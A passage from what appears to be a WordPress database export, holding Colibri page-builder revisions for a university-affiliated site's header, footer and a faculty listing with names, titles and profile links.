12345\",\"allIcons\":false,\"icon\":\"font-awesome\\/phone-square\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"http:\\/\\/maps.google.com\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"email@yoursite.com\",\"allIcons\":false,\"icon\":\"font-awesome\\/envelope\",\"type\":\"svg\"}]},\"styleRef\":54,\"slot\":null,\"parentId\":\"25-h20\",\"index\":0,\"id\":\"25-h21\",\"partialId\":25,\"type\":\"header\"}],\"id\":\"25-h20\",\"parentId\":\"25-h19\",\"partialId\":25,\"styleRef\":53,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"25\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/facebook-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/twitter-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/youtube-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/vimeo-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}}]},\"styleRef\":56,\"slot\":null,\"parentId\":\"25-h22\",\"index\":0,\"id\":\"25-h23\",\"partialId\":25,\"type\":\"header\"}],\"id\":\"25-h22\",\"parentId\":\"25-h19\",\"partialId\":25,\"styleRef\":55,\"type\":\"header\"}],\"id\":\"25-h19\",\"parentId\":\"25-h18\",\"partialId\":25,\"styleRef\":52,\"type\":\"header\"}],\"id\":\"25-h18\",\"parentId\":\"25-h2\",\"partialId\":25,\"styleRef\":51,\"type\":\"header\"}]}},{\"name\":\"hop-hero\",\"props\":{\"anchor\":false,\"name\":\"Hero\",\"attrs\":{\"id\":\"hero\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-page-title\",\"id\":\"25-h27\",\"parentId\":\"25-h26\",\"partialId\":25,\"styleRef\":60,\"type\":\"header\"}],\"id\":\"25-h26\",\"parentId\":\"25-h25\",\"partialId\":25,\"styleRef\":59,\"type\":\"header\"},{\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"25-h28\",\"parentId\":\"25-h25\",\"partialId\":25,\"styleRef\":278,\"type\":\"header\"}],\"parentId\":\"25-h24\",\"index\":0,\"id\":\"25-h25\",\"partialId\":25,\"styleRef\":58,\"type\":\"header\"}],\"parentId\":\"25-h1\",\"type\":\"header\",\"id\":\"25-h24\",\"partialId\":25,\"styleRef\":57}],\"id\":\"25-h1\",\"type\":\"header\",\"ui\":{\"isSelected\":true,\"isHovered\":false},\"partialId\":25,\"styleRef\":34}','','','inherit','closed','closed','','26-revision-v1','','','2023-10-13 09:59:38','2023-10-13 13:59:38','',26,'https://gsudice.dataconn.net/?p=1729',0,'revision','',0),(1730,1,'2023-10-13 09:59:38','2023-10-13 13:59:38','<div data-colibri-id=\"25-h1\" class=\"page-header style-34 style-local-25-h1 position-relative\">\n  <!---->\n  <div data-colibri-navigation-overlap=\"true\" role=\"banner\" class=\"h-navigation_outer h-navigation_overlap style-35-outer style-local-25-h2-outer\">\n    <!---->\n    <div id=\"navigation\" data-colibri-component=\"navigation\" data-colibri-id=\"25-h2\" class=\"h-section h-navigation h-navigation d-flex style-35 style-local-25-h2\">\n      <!---->\n      <div class=\"h-section-grid-container h-section-fluid-container\">\n        <div data-nav-normal=\"\">\n          <div data-colibri-id=\"25-h3\" class=\"h-row-container h-section-boxed-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-36 style-local-25-h3 position-relative\">\n            <!---->\n            <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n              <!---->\n              <div class=\"h-column h-column-container d-flex h-col-none style-37-outer style-local-25-h4-outer\">\n                <div data-colibri-id=\"25-h4\" data-placeholder-provider=\"navigation-logo\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-37 style-local-25-h4 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-id=\"25-h5\" class=\"d-flex align-items-center text-lg-left text-md-left text-left justify-content-lg-start justify-content-md-start justify-content-start style-38 style-local-25-h5 position-relative h-element\">\n                      <!---->\n                      <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\"><span class=\"h-logo__text h-logo__text_h logo-text d-inline-block style-38-text style-local-25-h5-text\">[colibri_site_title]</span></a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-39-outer style-local-25-h6-outer h-hide-sm\">\n                <div data-colibri-id=\"25-h6\" data-placeholder-provider=\"navigation-spacing\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-39 style-local-25-h6 h-hide-sm position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-id=\"25-h7\" class=\"style-40 style-local-25-h7 position-relative h-element\">\n                      <!---->\n                    </div>\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-41-outer style-local-25-h8-outer\">\n                <div data-colibri-id=\"25-h8\" data-placeholder-provider=\"navigation-menu\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-41 style-local-25-h8 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-component=\"dropdown-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"25-h9\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography has-offcanvas-tablet h-menu-horizontal h-dropdown-menu style-42 style-local-25-h9 position-relative h-element\">\n                      <!---->\n                      <div class=\"h-global-transition-all h-main-menu\">[colibri_print_menu id=\"header-menu\" classes=\"bordered-active-item bordered-active-item--bottom effect-borders-grow grow-from-center\" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                      <div data-colibri-id=\"25-h10\" class=\"h-mobile-menu h-global-transition-disable style-43 style-local-25-h10 position-relative h-element\">\n                        <!---->\n                        <a data-click-outside=\"true\" data-target=\"#offcanvas-wrapper-25-h10\" data-target-id=\"offcanvas-wrapper-25-h10\" data-offcanvas-overlay-id=\"offcanvas-overlay-25-h10\" href=\"#\" data-colibri-component=\"offcanvas\" data-direction=\"right\"\n                          data-push=\"false\" title=\"Menu\" class=\"h-hamburger-button\">\n                          <div class=\"icon-container h-hamburger-icon\">\n                            <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                              <!--Icon by Font Awesome (https://fontawesome.com)-->\n                              <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"bars\" viewBox=\"0 0 1536 1896.0833\">\n                                <path d=\"M1536 1344v128q0 26-19 45t-45 19H64q-26 0-45-19t-19-45v-128q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 960V832q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 448V320q0-26 19-45t45-19h1408q26 0 45 19t19 45z\"></path>\n                              </svg>\n                            </div>\n                          </div>\n                        </a>\n                        <div id=\"offcanvas-wrapper-25-h10\" class=\"h-offcanvas-panel offcanvas offcanvas-right hide force-hide style-43-offscreen style-local-25-h10-offscreen\">\n                          <div data-colibri-id=\"25-h11\" class=\"d-flex flex-column h-offscreen-panel style-44 style-local-25-h11 position-relative h-element\">\n                            <!---->\n                            <div class=\"offscreen-header h-ui-empty-state-container\">\n                              <div data-colibri-id=\"25-h13\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-45 style-local-25-h13 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-lg-6 h-col-md-6 h-col-12 style-46-outer style-local-25-h14-outer\">\n                                    <div data-colibri-id=\"25-h14\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-46 style-local-25-h14 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                                        <!---->\n                                        <div data-colibri-id=\"25-h15\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-47 style-local-25-h15 position-relative h-element\">\n                                          <!---->\n                                          <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\"><span class=\"h-logo__text h-logo__text_h logo-text d-inline-block style-47-text style-local-25-h15-text\">[colibri_site_title]</span></a>\n                                        </div>\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-content\">\n                              <!---->\n                              <div data-colibri-component=\"accordion-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"25-h12\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography h-mobile-menu h-menu-accordion style-50 style-local-25-h12 position-relative h-element\">\n                                <!---->\n                                <div class=\"h-global-transition-all h-mobile-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-footer h-ui-empty-state-container\">\n                              <div data-colibri-id=\"25-h16\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-48 style-local-25-h16 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-lg-6 h-col-md-6 h-col-12 style-49-outer style-local-25-h17-outer\">\n                                    <div data-colibri-id=\"25-h17\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-49 style-local-25-h17 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                                        <!---->\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                          </div>\n                        </div>\n                        <div id=\"offcanvas-overlay-25-h10\" class=\"offscreen-overlay style-43-offscreenOverlay style-local-25-h10-offscreenOverlay\"></div>\n                      </div>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n        <div data-nav-sticky=\"\" style=\"display: none;\"></div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-id=\"25-h24\" id=\"hero\" class=\"h-section h-hero d-flex align-items-lg-center align-items-md-center align-items-center style-57 style-local-25-h24 position-relative\">\n    <!---->\n    <!---->\n    <div style=\"height: 70px; bottom: calc(0px);\" class=\"h-separator\">\n      <svg style=\"fill:#f6f8fa;transform:rotateX(180deg);\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1000 100\" preserveAspectRatio=\"none\">\n        <g opacity=\"0.33\">\n          <path d=\"M385.42,52.92c-11.63,4.22-23.18,9-34.52,14.38-103.18,49-91.83-33.55-148.36-.49,50.13,17.35,121.87,64.84,270.46.49,11-4.7,64.52-25.43,118-41.8-4-.52-8.45-.95-13.41-1.28C507.83,41.64,455.4,71.84,385.42,52.92Z\" transform=\"translate(0 0)\" style=\"isolation:isolate\"></path>\n          <path d=\"M0,59.7S48.08,103,116.06,83.43C54.25,76.6,0,39.8,0,39.8Z\" transform=\"translate(0 0)\" style=\"isolation:isolate\"></path>\n          <path d=\"M916.4,48.1c-55.76,5.45-76.83,2-111.28-7.81-3.09,1.4-6.07,2.81-9,4.22,13.93,8.57,25.54,16.74,33.15,22.39,13,9.8,43,25.4,75.8,22.1S1000,59.7,1000,59.7V36.5s-6.87-4.5-21.48-9.06C966,36.56,946.56,45.15,916.4,48.1Z\" transform=\"translate(0 0)\" style=\"isolation:isolate\"></path>\n        </g>\n        <g opacity=\"0.66\">\n          <path d=\"M771.65,30.49,766.1,28.9c-55-15.81-99.84-18-138.66-13.76a368.79,368.79,0,0,0-49.81,9.08c5,.33,9.44.76,13.41,1.28a89.13,89.13,0,0,1,13.86,2.7C656.8,44.1,688.5,67.3,734,67.3c19.82,0,38-11.12,62.15-22.79,2.9-1.41,5.88-2.82,9-4.22C795.39,37.52,784.59,34.23,771.65,30.49Z\"\n            transform=\"translate(0 0)\"></path>\n          <path d=\"M371,48.4C242,1.8,242,5.4,184.8,20.6,128,35.8,132.3,44.9,89.9,52.5,28.6,63.7,0,0,0,0V39.8S54.25,76.6,116.06,83.43c28.46,3.15,58.53-.05,85.64-16.13l.84-.49c56.53-33.06,45.18,49.44,148.36.49,11.34-5.38,22.89-10.16,34.52-14.38Q378.34,51,371,48.4Z\"\n            transform=\"translate(0 0)\"></path>\n          <path d=\"M978.52,27.44C993.13,32,1000,36.5,1000,36.5V0S996.54,14.27,978.52,27.44Z\" transform=\"translate(0 0)\"></path>\n        </g>\n        <path d=\"M0,0S28.6,63.7,89.9,52.5c42.4-7.6,38.1-16.7,94.9-31.9C242,5.4,242,1.8,371,48.4q7.33,2.61,14.42,4.52c70,18.92,122.41-11.28,192.21-28.7a368.79,368.79,0,0,1,49.81-9.08c38.82-4.21,83.68-2.05,138.66,13.76l5.55,1.59c12.94,3.74,23.74,7,33.47,9.8,34.45,9.83,55.52,13.26,111.28,7.81,30.16-3,49.63-11.54,62.12-20.66C996.54,14.27,1000,0,1000,0Z\"\n          transform=\"translate(0 0)\"></path>\n      </svg>\n    </div>\n    <div class=\"h-section-grid-container h-navigation-padding h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"25-h25\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-58 style-local-25-h25 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-59-outer style-local-25-h26-outer\">\n            <div data-colibri-id=\"25-h26\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-59 style-local-25-h26 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"25-h27\" class=\"page-title style-60 style-local-25-h27 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-page-title__outer style-60-outer style-local-25-h27-outer\">\n                    <div class=\"h-global-transition-all\">[colibri_page_title tag=\"h1\"]</div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <!---->\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','header_post','','inherit','closed','closed','','25-revision-v1','','','2023-10-13 09:59:38','2023-10-13 13:59:38','',25,'https://gsudice.dataconn.net/?p=1730',0,'revision','',0),(1731,1,'2023-10-13 09:59:38','2023-10-13 13:59:38','{\"name\":\"hop-footer\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Footers\",\"attrs\":{\"id\":\"Footers\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-copyright\",\"slot\":null,\"parentId\":\"28-f4\",\"index\":0,\"id\":\"28-f5\",\"partialId\":28,\"styleRef\":270,\"type\":\"footer\"}],\"id\":\"28-f4\",\"parentId\":\"28-f3\",\"partialId\":28,\"styleRef\":269,\"type\":\"footer\"}],\"parentId\":\"28-f2\",\"index\":0,\"id\":\"28-f3\",\"partialId\":28,\"styleRef\":268,\"type\":\"footer\"}],\"id\":\"28-f2\",\"parentId\":\"28-f1\",\"partialId\":28,\"styleRef\":267,\"type\":\"footer\"}],\"id\":\"28-f1\",\"ui\":{\"isSelected\":false,\"isHovered\":false},\"type\":\"footer\",\"partialId\":28,\"styleRef\":266}','','','inherit','closed','closed','','29-revision-v1','','','2023-10-13 09:59:38','2023-10-13 13:59:38','',29,'https://gsudice.dataconn.net/?p=1731',0,'revision','',0),(1732,1,'2023-10-13 09:59:38','2023-10-13 13:59:38','<div data-enabled=\"true\" data-colibri-component=\"footer-parallax\" data-colibri-id=\"28-f1\" class=\"page-footer style-266 style-local-28-f1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"28-f2\" id=\"Footers\" class=\"h-section h-section-global-spacing d-flex align-items-lg-end align-items-md-end align-items-end style-267 style-local-28-f2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"28-f3\" class=\"h-row-container gutters-row-lg-1 gutters-row-md-1 gutters-row-2 gutters-row-v-lg-1 gutters-row-v-md-1 gutters-row-v-2 style-268 style-local-28-f3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-1 gutters-col-md-1 gutters-col-2 gutters-col-v-lg-1 gutters-col-v-md-1 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-269-outer style-local-28-f4-outer\">\n            <div data-colibri-id=\"28-f4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-1 h-px-md-1 h-px-2 v-inner-lg-1 v-inner-md-1 v-inner-2 style-269 style-local-28-f4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"28-f5\" class=\"style-270 style-local-28-f5 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-global-transition-all\">[colibri_copyright]© {year} {site-name}. Created for free using WordPress and\n                    <a target=\"_blank\" href=\"https://colibriwp.com\" rel=\"noopener\">Colibri</a>[/colibri_copyright]</div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','footer_post','','inherit','closed','closed','','28-revision-v1','','','2023-10-13 09:59:38','2023-10-13 13:59:38','',28,'https://gsudice.dataconn.net/?p=1732',0,'revision','',0),(1734,1,'2023-10-13 10:00:15','2023-10-13 14:00:15','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Faculty\",\"attrs\":{\"id\":\"faculty\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c4\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c4\",\"index\":0,\"id\":\"182-c5\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-cropped-cropped-headshot-1-e1651208089645-2-e1697201737742.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1697,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c4\",\"index\":0,\"id\":\"182-c6\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Chetan Tiwari\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c4\",\"index\":2,\"id\":\"182-c7\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Director<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c4\",\"index\":1,\"id\":\"182-c8\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/chetan-tiwari\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/chetan-tiwari\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=C5PVPkoAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c4\",\"index\":1,\"id\":\"182-c9\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c10\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c10\",\"index\":0,\"id\":\"182-c11\",\"partialId\":182,\"styleRef\":978,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-cropped-Portrait-1-e1697202215204.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1701,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c10\",\"index\":0,\"id\":\"182-c12\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Armin Mikler\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c10\",\"index\":2,\"id\":\"182-c13\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p> Chair and Professor<br><\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c10\",\"index\":1,\"id\":\"182-c14\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/armin-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/armin-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=41ckZZsAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c10\",\"index\":1,\"id\":\"182-c15\",\"partialId\":182,\"styleRef\":979,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c16\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c16\",\"index\":0,\"id\":\"182-c17\",\"partialId\":182,\"styleRef\":980,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/sunderraman1.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":692,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c16\",\"index\":0,\"id\":\"182-c18\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Raj Sunderraman\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c16\",\"index\":2,\"id\":\"182-c19\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Associate Chair and Professor<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c16\",\"index\":1,\"id\":\"182-c20\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/raj-sunderraman-a5591bb2\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/raj-sunderraman\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?hl=en&user=Wlxc9FEAAAAJ\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c16\",\"index\":1,\"id\":\"182-c21\",\"partialId\":182,\"styleRef\":981,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c22\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c22\",\"index\":0,\"id\":\"182-c23\",\"partialId\":182,\"styleRef\":982,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-SRM-360x360-1-e1697202435329.png\",\"caption\":{\"text\":\"\"},\"imageId\":1704,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c22\",\"index\":0,\"id\":\"182-c24\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Susie Ramisetty-Mikler\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c22\",\"index\":2,\"id\":\"182-c25\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Research Associate Professor<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c22\",\"index\":1,\"id\":\"182-c26\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Population Health 